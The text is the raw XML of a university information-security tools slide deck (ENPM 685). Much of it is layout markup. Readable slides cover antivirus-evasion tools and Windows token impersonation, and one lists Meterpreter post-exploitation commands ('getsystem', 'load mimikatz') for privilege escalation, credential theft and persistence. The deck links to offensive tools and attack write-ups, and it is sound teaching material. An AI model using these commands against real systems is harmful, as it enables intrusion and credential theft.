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494" r:id="rId4"/>
    <p:sldId id="495" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="263" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="347" r:id="rId11"/>
    <p:sldId id="527" r:id="rId12"/>
    <p:sldId id="528" r:id="rId13"/>
    <p:sldId id="306" r:id="rId14"/>
    <p:sldId id="267" r:id="rId15"/>
    <p:sldId id="307" r:id="rId16"/>
    <p:sldId id="308" r:id="rId17"/>
    <p:sldId id="309" r:id="rId18"/>
    <p:sldId id="310" r:id="rId19"/>
    <p:sldId id="268" r:id="rId20"/>
    <p:sldId id="314" r:id="rId21"/>
    <p:sldId id="313" r:id="rId22"/>
    <p:sldId id="311" r:id="rId23"/>
    <p:sldId id="265" r:id="rId24"/>
    <p:sldId id="533" r:id="rId25"/>
    <p:sldId id="266" r:id="rId26"/>
    <p:sldId id="269" r:id="rId27"/>
    <p:sldId id="523" r:id="rId28"/>
    <p:sldId id="535" r:id="rId29"/>
    <p:sldId id="536" r:id="rId30"/>
    <p:sldId id="270" r:id="rId31"/>
    <p:sldId id="315" r:id="rId32"/>
    <p:sldId id="532" r:id="rId33"/>
    <p:sldId id="531" r:id="rId34"/>
    <p:sldId id="530" r:id="rId35"/>
    <p:sldId id="586" r:id="rId36"/>
    <p:sldId id="593" r:id="rId37"/>
    <p:sldId id="524" r:id="rId38"/>
    <p:sldId id="529" r:id="rId39"/>
    <p:sldId id="271" r:id="rId40"/>
    <p:sldId id="272" r:id="rId41"/>
    <p:sldId id="525" r:id="rId42"/>
    <p:sldId id="274" r:id="rId43"/>
    <p:sldId id="275" r:id="rId44"/>
    <p:sldId id="517" r:id="rId45"/>
    <p:sldId id="366" r:id="rId46"/>
    <p:sldId id="367" r:id="rId47"/>
    <p:sldId id="368" r:id="rId48"/>
    <p:sldId id="369" r:id="rId49"/>
    <p:sldId id="374" r:id="rId50"/>
    <p:sldId id="276" r:id="rId51"/>
    <p:sldId id="520" r:id="rId52"/>
    <p:sldId id="521" r:id="rId53"/>
    <p:sldId id="444" r:id="rId54"/>
    <p:sldId id="445" r:id="rId55"/>
    <p:sldId id="443" r:id="rId56"/>
    <p:sldId id="320" r:id="rId57"/>
    <p:sldId id="349" r:id="rId58"/>
    <p:sldId id="348" r:id="rId59"/>
    <p:sldId id="316" r:id="rId60"/>
    <p:sldId id="496" r:id="rId61"/>
    <p:sldId id="497" r:id="rId62"/>
    <p:sldId id="498" r:id="rId63"/>
    <p:sldId id="499" r:id="rId64"/>
    <p:sldId id="317" r:id="rId65"/>
    <p:sldId id="318" r:id="rId66"/>
    <p:sldId id="319" r:id="rId67"/>
    <p:sldId id="352" r:id="rId68"/>
    <p:sldId id="353" r:id="rId69"/>
    <p:sldId id="354" r:id="rId70"/>
    <p:sldId id="355" r:id="rId71"/>
    <p:sldId id="351" r:id="rId72"/>
    <p:sldId id="510" r:id="rId73"/>
    <p:sldId id="511" r:id="rId74"/>
    <p:sldId id="512" r:id="rId75"/>
    <p:sldId id="288" r:id="rId76"/>
    <p:sldId id="513" r:id="rId77"/>
    <p:sldId id="289" r:id="rId78"/>
    <p:sldId id="291" r:id="rId79"/>
    <p:sldId id="290" r:id="rId80"/>
    <p:sldId id="538" r:id="rId81"/>
    <p:sldId id="292" r:id="rId82"/>
    <p:sldId id="293" r:id="rId83"/>
    <p:sldId id="294" r:id="rId84"/>
    <p:sldId id="537" r:id="rId85"/>
    <p:sldId id="295" r:id="rId86"/>
    <p:sldId id="534" r:id="rId87"/>
    <p:sldId id="296" r:id="rId88"/>
    <p:sldId id="297" r:id="rId89"/>
    <p:sldId id="298" r:id="rId90"/>
    <p:sldId id="323" r:id="rId91"/>
    <p:sldId id="324" r:id="rId92"/>
    <p:sldId id="325" r:id="rId93"/>
    <p:sldId id="326" r:id="rId94"/>
    <p:sldId id="327" r:id="rId95"/>
    <p:sldId id="328" r:id="rId96"/>
    <p:sldId id="329" r:id="rId97"/>
    <p:sldId id="331" r:id="rId98"/>
    <p:sldId id="333" r:id="rId99"/>
    <p:sldId id="334" r:id="rId100"/>
    <p:sldId id="335" r:id="rId101"/>
    <p:sldId id="336" r:id="rId102"/>
    <p:sldId id="330" r:id="rId103"/>
    <p:sldId id="304" r:id="rId104"/>
    <p:sldId id="337" r:id="rId105"/>
    <p:sldId id="338" r:id="rId106"/>
    <p:sldId id="356" r:id="rId107"/>
    <p:sldId id="357" r:id="rId108"/>
    <p:sldId id="358" r:id="rId109"/>
    <p:sldId id="359" r:id="rId110"/>
    <p:sldId id="339" r:id="rId111"/>
    <p:sldId id="340" r:id="rId112"/>
    <p:sldId id="341" r:id="rId113"/>
    <p:sldId id="342" r:id="rId114"/>
    <p:sldId id="343" r:id="rId115"/>
    <p:sldId id="344" r:id="rId116"/>
    <p:sldId id="345" r:id="rId117"/>
    <p:sldId id="514" r:id="rId118"/>
    <p:sldId id="360" r:id="rId119"/>
    <p:sldId id="378" r:id="rId120"/>
    <p:sldId id="379" r:id="rId121"/>
    <p:sldId id="361" r:id="rId122"/>
    <p:sldId id="515" r:id="rId123"/>
    <p:sldId id="594" r:id="rId124"/>
    <p:sldId id="299" r:id="rId125"/>
    <p:sldId id="406" r:id="rId126"/>
    <p:sldId id="312" r:id="rId127"/>
    <p:sldId id="413" r:id="rId128"/>
    <p:sldId id="414" r:id="rId129"/>
    <p:sldId id="415" r:id="rId130"/>
    <p:sldId id="419" r:id="rId131"/>
    <p:sldId id="426" r:id="rId132"/>
    <p:sldId id="417" r:id="rId133"/>
    <p:sldId id="418" r:id="rId134"/>
    <p:sldId id="416" r:id="rId135"/>
    <p:sldId id="439" r:id="rId136"/>
    <p:sldId id="425" r:id="rId137"/>
    <p:sldId id="420" r:id="rId138"/>
    <p:sldId id="423" r:id="rId139"/>
    <p:sldId id="424" r:id="rId1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5"/>
    <p:restoredTop sz="94540"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="104" d="100"/>
          <a:sy n="104" d="100"/>
        </p:scale>
        <p:origin x="2208"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FECD78-3C8E-49F2-8FAB-59489D168ABB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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t>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FECD78-3C8E-49F2-8FAB-59489D168ABB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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t>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t>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BFECD78-3C8E-49F2-8FAB-59489D168ABB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/7/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Slide Number Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FB56013-B943-42BA-886F-6F9D4EB85E9D}"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0FB56013-B943-42BA-886F-6F9D4EB85E9D}"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6BFECD78-3C8E-49F2-8FAB-59489D168ABB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/7/22</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nullsecurity.net/tools/binary.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://upx.sourceforge.net/"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labs.mwrinfosecurity.com/system/assets/142/original/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf"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gentilkiwi/mimikatz" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.gentilkiwi.com/mimikatz"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www.openwall.com/john/"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www.onlinehashcrack.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cloudcracker.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mars.praetorian.com/"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hashcat.net/"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fastandeasyhacking.com/"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www.cobaltstrike.com/"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s://github.com/SpiderLabs/Responder"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github.com/BloodHoundAD/BloodHound"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github.com/EmpireProject/Empire" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.powershellempire.com/"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byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/byt3bl33d3r/DeathStar"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checkpoint.com/2017/05/25/brokers-shadows-analyzing-vulnerabilities-attacks-spawned-leaked-nsa-hacking-tools/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mandiant.com/resources/smb-exploited-wannacry-use-of-eternalblu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drupal.org/PSA-2014-003" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://heartbleed.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drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sq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drupal.org/PSA-2014-00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victi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blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedi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docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-068"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dsecurity.org/?p=1640" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-15/materials/us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/"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cyberscoop.com/coalfire-security-pros-arrested-for-breaking-into-iowa-courthouse-are-still-bitter/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.darkreading.com/vulnerabilities-threats/pen-testers-who-got-arrested-doing-their-jobs-tell-all" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2019/11/how-a-turf-war-and-a-botched-contract-landed-2-pentesters-in-iowa-jail/"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www.nbcwashington.com/news/local/Man-Posing-as-Walmart-Employee-Sends-Away-Cashier-Steals-Money-From-Register-364500471.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nakedsecurity.sophos.com/2016/05/13/want-to-keep-your-password-safe-give-up-chocolat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getgophish.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www.exploit-db.co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twitter.com/JackRhysider/status/1095095178078113792"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offensive-security.com/metasploit-unleashed/"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netsec.ws/?p=331"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Information Security Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ENPM 685</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52920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Vulnerable vs Exploitable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="TS-vuln-exploit.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-400" b="-400"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr/>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38407549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6-06-21 at 2.58.14 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-14097" b="-14097"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="191960" y="551481"/>
            <a:ext cx="8754108" cy="5515088"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42453462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6-06-21 at 3.03.53 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-25986" b="-25986"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="-555588"/>
            <a:ext cx="6627416" cy="4175272"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2016-06-21 at 3.04.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763" y="2806700"/>
            <a:ext cx="4775200" cy="4051300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42438783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evasion techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>peCloak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Hyperion - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://nullsecurity.net/tools/binary.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>UPX packing - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://upx.sourceforge.net/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Custom mix of evading (and testing with public tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>VirusTotal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> sparingly)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3064403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Exploitation - Windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>use incognito</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getsystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mimikatz</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0"/>
              <a:t>Create persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14916662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Incognito</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Originally a standalone tool, merged into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonate user tokens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://labs.mwrinfosecurity.com/system/assets/142/original/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are tokens? A temporary key that allows you to access system/network resources without having to provide credentials every time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegate tokens – for interactive logins like RDP (remote desktop)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonate tokens – for non interactive user like mounting attaching a network drive or running a script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tokens persist until a reboot</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33754299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getsystem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to elevate privilege to that of local SYSTEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> by default tries all the following methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service – Named Pipe Impersonation (In memory)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service – Named Pipe Impersonation (File Dropper)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service – Token Duplication (In memory)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2016-06-21 at 10.4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19" y="4377258"/>
            <a:ext cx="8686800" cy="1307819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29837180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 Quick Word on Windows Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Screen Shot 2016-06-22 at 4.54.28 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-5517" b="-5517"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="148529" y="1153097"/>
            <a:ext cx="8329687" cy="5247703"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22166295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6-06-22 at 4.54.46 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-7381" b="-7381"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1086250"/>
            <a:ext cx="8435794" cy="5314550"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35238571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6-06-22 at 11.00.46 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-2426" b="-2426"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1312164"/>
            <a:ext cx="8077200" cy="5088636"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
